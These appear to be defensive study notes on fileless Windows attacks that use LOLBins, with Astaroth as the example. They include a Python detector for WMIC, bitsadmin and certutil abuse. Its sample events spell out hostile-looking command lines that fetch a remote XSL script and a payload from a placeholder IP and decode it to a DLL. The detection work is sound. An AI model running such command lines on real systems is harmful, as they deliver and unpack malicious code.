💾 Windows File Transfer Methods: Intro & APT Example
The Windows OS keeps changing, and so do the ways files can be moved onto and off a host.
Attackers use these methods to bring tooling onto a machine while avoiding detection; defenders need to know the same methods to spot the abuse (unusual parent processes, LOLBins reaching out to the internet, Base64 blobs being decoded on disk).
🧠 Key Learning: Fileless Threats
🦠 Fileless threats = no obvious malicious executable is written to disk
Instead, attackers abuse built-in, signed Windows tools (living-off-the-land binaries, or LOLBins) so the payload lives mainly in memory, which sidesteps file-based antivirus scanning (sneaky!).
🕵️‍♂️ The Astaroth Attack, Step by Step
Microsoft's write-up of the Astaroth info-stealer is used here as an example of an APT (Advanced Persistent Threat) that ran almost entirely in memory.
It followed these steps:
🎣 Spear-phishing email: the victim opens a malicious LNK (shortcut) file
🛠️ The LNK launches the WMIC tool with the /format flag, pointing it at a remote XSL stylesheet
The stylesheet carries JavaScript, which WMIC executes
The JavaScript abuses the Bitsadmin tool (the BITS command-line client) to download more payloads
The payloads are Base64-encoded text; Certutil decodes them back into binaries, which turn out to be DLL files
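Below is an added detection example written for these notes; it is not code from Microsoft's write-up or from the original page. It runs simple command-line rules over constructed process-creation events (Sysmon Event ID 1 style, with parent, image and command line) that mirror the three LOLBin stages listed above, plus a `certutil -urlcache` rule that goes beyond the page as a closely related downloader indicator. The IP address, paths and job name in the sample events are made up for the example.

```python
import re

# Stage rules for the LOLBin abuse in the Astaroth chain above.
# Each pattern runs over the lower-cased command line of one process-creation event.
STAGE_RULES = [
    # WMIC pulling a remote XSL stylesheet: the stylesheet can carry script.
    ("wmic_remote_xsl", re.compile(r"\bwmic(?:\.exe)?\b.*\s/format:\s*[\"']?(?:https?|ftp)://")),
    # BITS driven from the command line as a downloader.
    ("bitsadmin_download", re.compile(r"\bbitsadmin(?:\.exe)?\b.*\s/(?:transfer|addfile)\b")),
    # certutil turning a Base64 text blob back into a binary (the DLL stage).
    ("certutil_decode", re.compile(r"\bcertutil(?:\.exe)?\b.*\s-decode\b")),
    # certutil as a downloader: not in the notes above, added as a related indicator.
    ("certutil_urlcache", re.compile(r"\bcertutil(?:\.exe)?\b.*\s-urlcache\b.*(?:https?|ftp)://")),
]


def match_stages(command_line):
    """Return the stage labels whose pattern matches a single command line."""
    cl = command_line.lower()
    return [label for label, rx in STAGE_RULES if rx.search(cl)]


def triage(events):
    """Group matching events by stage and count how much of the chain is present.

    events: iterable of dicts with 'parent', 'image' and 'cmd' keys.
    Returns (hits, score): hits maps stage label -> matched command lines,
    score is the number of distinct stages seen. One stage on its own is
    often admin noise; two or more on one host in a short window is the
    pattern worth escalating.
    """
    hits = {}
    for ev in events:
        for stage in match_stages(ev["cmd"]):
            hits.setdefault(stage, []).append(ev["cmd"])
    return hits, len(hits)


# Constructed sample events (not real telemetry) mirroring the chain,
# followed by benign uses of the same tools that must NOT fire.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "wmic.exe",
     "cmd": 'wmic os get /format:"https://203.0.113.5/abc.xsl"'},
    {"parent": "wmic.exe", "image": "bitsadmin.exe",
     "cmd": "bitsadmin /transfer job1 /download /priority foreground "
            "https://203.0.113.5/p.txt C:\\Users\\Public\\p.txt"},
    {"parent": "wmic.exe", "image": "certutil.exe",
     "cmd": "certutil -decode C:\\Users\\Public\\p.txt C:\\Users\\Public\\p.dll"},
    {"parent": "cmd.exe", "image": "wmic.exe",
     "cmd": "wmic os get caption /format:list"},
    {"parent": "cmd.exe", "image": "certutil.exe",
     "cmd": "certutil -verify C:\\certs\\server.cer"},
    {"parent": "cmd.exe", "image": "bitsadmin.exe",
     "cmd": "bitsadmin /list /allusers"},
]


if __name__ == "__main__":
    hits, score = triage(SAMPLE_EVENTS)
    for stage, cmds in hits.items():
        print(f"{stage}:")
        for cmd in cmds:
            print("   ", cmd)
    print("distinct stages seen:", score)
```

The rules key on the flags that make each tool a transfer or decoding primitive (`/format:` with a URL, `/transfer` or `/addfile`, `-decode`, `-urlcache` with a URL) rather than on the tool name alone, which is why the three benign lines produce no hits. In real telemetry the parent field is the next thing to check: `wmic.exe` spawning `bitsadmin.exe` or `certutil.exe` is far more suspicious than `cmd.exe` doing so.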